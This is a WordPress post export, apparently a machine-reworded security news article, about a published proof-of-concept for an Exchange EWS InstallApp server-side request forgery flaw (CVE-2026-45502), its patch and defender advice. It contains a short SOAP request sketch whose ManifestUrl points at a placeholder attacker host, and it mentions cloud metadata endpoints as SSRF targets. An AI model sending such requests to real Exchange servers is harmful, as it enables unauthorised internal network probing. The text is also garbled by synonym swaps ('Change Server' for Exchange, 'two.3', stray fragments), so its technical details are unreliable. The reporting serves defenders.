{"id":16052,"date":"2026-06-24T10:30:48","date_gmt":"2026-06-24T10:30:48","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=16052"},"modified":"2026-06-24T10:30:48","modified_gmt":"2026-06-24T10:30:48","slug":"poc-launched-for-microsoft-change-server-ews-installapp-ssrf-vulnerability","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=16052","title":{"rendered":"PoC Launched for Microsoft Change Server EWS InstallApp SSRF Vulnerability"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p class=\"wp-block-paragraph\">A proof-of-concept exploit has been launched for CVE-2026-45502, a server-side request forgery (SSRF) vulnerability within the Microsoft Change Server\u2019s <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/gbhackers.com\/xhunt-apt-2\/\" type=\"post\" id=\"172319\" target=\"_blank\" rel=\"noreferrer noopener\">Change Internet Providers (EWS) <\/a>InstallApp operation. This vulnerability poses dangers to organisations that haven&#8217;t but deployed the safety updates from June 2026.<\/p>\n<p class=\"wp-block-paragraph\">The flaw impacts Change Server variations 2016 CU23, 2019 CU14 and CU15, and the Change Server Subscription Version RTM. An authenticated mailbox consumer can misuse the ManifestUrl parameter in an InstallApp SOAP name to compel the server to ship HTTP requests to attacker-controlled inner or exterior endpoints.<\/p>\n<h2 id=\"h-microsoft-exchange-server-ssrf-vulnerability\" class=\"wp-block-heading\"><strong>Microsoft Change Server SSRF Vulnerability<\/strong><\/h2>\n<p class=\"wp-block-paragraph\">Microsoft charges the vulnerability with a CVSS 3.1 rating of 5.0 (medium), primarily based on standards comparable to community assault vector, low assault complexity, low required privileges, no consumer interplay, and a change in scope with restricted confidentiality impression. <\/p>\n<p class=\"wp-block-paragraph\">A extra detailed CVSS 4.0 analysis assigns a rating of two.3 (low), whereas nonetheless acknowledging the proof-of-concept standing and potential real-world dangers in delicate community configurations,<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/aretiq.ai\/research\/vul260622-cve-2026-45502-microsoft-exchange-server-ews-installapp-server-side-request-forgery\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"> as reported by Aretiq<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">The basis reason for the difficulty is inadequate URL validation inside the SynchronousDownloadData.DownloadDataFromUri() routine, which processes user-supplied ManifestUrl values throughout EWS add-in set up. <\/p>\n<p class=\"wp-block-paragraph\">In on-premises Change deployments, the verify for intranet-address SSRF relies on a cloud-specific isBposUser flag that&#8217;s all the time set to false. In consequence, the internal-address blocking logic doesn&#8217;t function, permitting the server to belief arbitrary URLs offered by authenticated customers.<\/p>\n<p class=\"wp-block-paragraph\">This logic error successfully transforms Change right into a community proxy that may entry inner HTTP providers, metadata endpoints comparable to 169.254.169.254, and different restricted sources from the server\u2019s privileged community place. <\/p>\n<p class=\"wp-block-paragraph\">Though the SSRF is essentially blind, researchers have proven that the response conduct, HTTP error codes, and timing will be utilized to map inner providers and make sure their reachability, making a dependable methodology for inner reconnaissance and potential chaining with different vulnerabilities.<\/p>\n<p class=\"wp-block-paragraph\">To reveal exploitability, researchers revealed a PoC workflow that begins a easy HTTP listener after which sends a crafted EWS InstallApp request with a ManifestUrl pointing again to that listener, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/gbhackers.com\/critical-zimbra-ssrf-flaw\/\" type=\"post\" id=\"166581\" target=\"_blank\" rel=\"noreferrer noopener\">confirming the SSRF<\/a> when the Change server initiates an inbound callback. A minimal pseudocode-style PoC fragment will be represented as follows, omitting full automation for security and brevity:<\/p>\n<pre class=\"wp-block-code\"><code># Minimal PoC sketch (for lab validation solely)\nsoap_body = \"\"\"\n<envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\" xmlns:m=\"http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/messages\">\n  <body>\n    \n      <manifesturl>http:\/\/ATTACKER_IP:8888\/ssrf-test<\/manifesturl>\n    <\/installapp>\n  <\/body>\n<\/envelope>\n\"\"\"\n# Ship SOAP physique to https:\/\/EXCHANGE\/EWS\/Change.asmx with authenticated EWS request<\/code><\/pre>\n<p class=\"wp-block-paragraph\">In a susceptible surroundings, the Change server performs an HTTP GET to the desired URL, typically appending the corr=<guid> correlation parameter. <\/guid><\/p>\n<p class=\"wp-block-paragraph\">In distinction, a patched system rejects the request earlier than establishing an outbound connection. The existence of such a PoC, even in restricted kind, will increase the probability of opportunistic probing and red-team adoption, particularly in environments the place Change servers have broad east\u2013west visibility.dbugs.<\/p>\n<p class=\"wp-block-paragraph\">Microsoft addressed CVE-2026-45502 within the June 9, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/gbhackers.com\/microsoft-patch-tuesday-june-2026\/\" type=\"post\" id=\"188829\" target=\"_blank\" rel=\"noreferrer noopener\">2026 Patch Tuesday launch through KB5094139<\/a> for Change Server Subscription Version and corresponding safety updates for Change 2016 and 2019. <\/p>\n<p class=\"wp-block-paragraph\">The repair replaces the isBposUser-gated logic with a feature-flag-driven mannequin that enforces ManifestUrlValidation for all deployments and introduces ManifestUrlCheck, an allowlist that, by default, solely permits trusted authorities comparable to officeclient.microsoft.com, with non-compulsory, administrator-configurable entries. <\/p>\n<p class=\"wp-block-paragraph\">Organizations ought to confirm that their Change builds meet or exceed the mounted variations documented in Microsoft\u2019s steering and third-party advisories, and any occasion under these builds needs to be handled as susceptible till patched. <\/p>\n<p class=\"wp-block-paragraph\">In parallel, defenders are urged to lock down outbound connectivity from Change servers, monitor for anomalous HTTP site visitors originating from Change to inner ranges or uncommon exterior hosts, and apply strict entry controls round EWS endpoints, on condition that legitimate credentials stay a prerequisite for exploitation.<\/p>\n<p class=\"has-text-align-center has-background wp-block-paragraph\" style=\"background:linear-gradient(135deg,rgb(238,238,238) 100%,rgb(169,184,195) 100%)\"><strong>Comply with us on\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.google.com\/publications\/CAAqKAgKIiJDQklTRXdnTWFnOEtEV2RpYUdGamEyVnljeTVqYjIwb0FBUAE?hl=en-IN&amp;gl=IN&amp;ceid=IN%3Aen\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google Information<\/a>,\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.linkedin.com\/company\/cyber-threat-intel\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>, and\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/x.com\/The_Cyber_News\" target=\"_blank\" rel=\"noreferrer noopener\">X<\/a>\u00a0to Get On the spot Updates and Set GBH as a Most popular Supply in\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.google.com\/preferences\/source?q=https:\/\/gbhackers.com\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>A proof-of-concept exploit has been launched for CVE-2026-45502, a server-side request forgery (SSRF) vulnerability within the Microsoft Change Server\u2019s Change Internet Providers (EWS) InstallApp operation. This vulnerability poses dangers to organisations that haven&#8217;t but deployed the safety updates from June 2026. The flaw impacts Change Server variations 2016 CU23, 2019 CU14 and CU15, and the [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":16054,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[9534,2142,9535,618,4748,4514,1619,9536,1061],"class_list":["post-16052","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-ews","tag-exchange","tag-installapp","tag-microsoft","tag-poc","tag-released","tag-server","tag-ssrf","tag-vulnerability"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/16052","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16052"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/16052\/revisions"}],"predecessor-version":[{"id":16053,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/16052\/revisions\/16053"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/16054"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16052"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16052"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16052"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- This website is optimized by Airlift. Learn more: https://airlift.net. Template:. Learn more: https://airlift.net. Template: 69d9690a190636c2e0989534. Config Timestamp: 2026-04-10 21:18:02 UTC, Cached Timestamp: 2026-06-24 13:25:46 UTC -->